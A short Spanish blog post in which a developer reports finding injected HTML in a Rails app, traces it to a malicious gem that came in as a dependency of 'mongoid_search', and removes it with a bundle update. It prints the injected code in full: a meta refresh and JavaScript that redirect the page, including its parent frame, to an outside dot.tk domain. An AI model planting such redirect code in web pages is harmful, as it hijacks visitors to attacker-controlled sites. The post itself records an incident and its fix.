TTACK Malware en Rails [SOLUCIÓN]


  

Ayer que fui a revisar un servidor Rails que monté hace tiempo, me di cuenta de que cuando booteaba el localhost me aparecía un código inyectado (en la consola) que se veía así:

<html> 

  <head>
    <title>ttack.tk</title>
    <meta http-equiv="refresh" content="2; URL=http://domain.dot.tk/p/?d=TTACK&i=201.156.231.200&c=52&ro=0&ref=unknown&_=1370450779247"/>
    <script type="text/javascript">
    <!--
      function redir(){ var $fwd = 'http://domain.dot.tk/p/?d=TTACK&i=201.156.231.200&c=52&ro=0&ref=unknown&_=1370450779247'; if(window.parent){ window.parent.location=$fwd; }else{ window.location=$fwd; }}
    //-->
    </script>
  </head>
  <body onload="redir()">
    <script language="text/javascript">
    <!--
      window.setTimeout('redir();', 500 * 1);
    //-->
    </script>
  </body>
</html>

Y resulta que investigando un poco descubrimos de que se trata de un malware en la gema "gemattack" de Rails. Esta gema no se estaba usando explícitamente en la aplicación pero era dependencia de una que sí estaba usando: "mongoid_search". La solución resultó ser actualizar dicha gema con:

bundle update mongoid_search

Tras una rápida visita de bundler a github y rails gems, un download de nuevo código y "rebundle" de mi stack (todo hecho con el comando de arriba) el problema había desaparecido.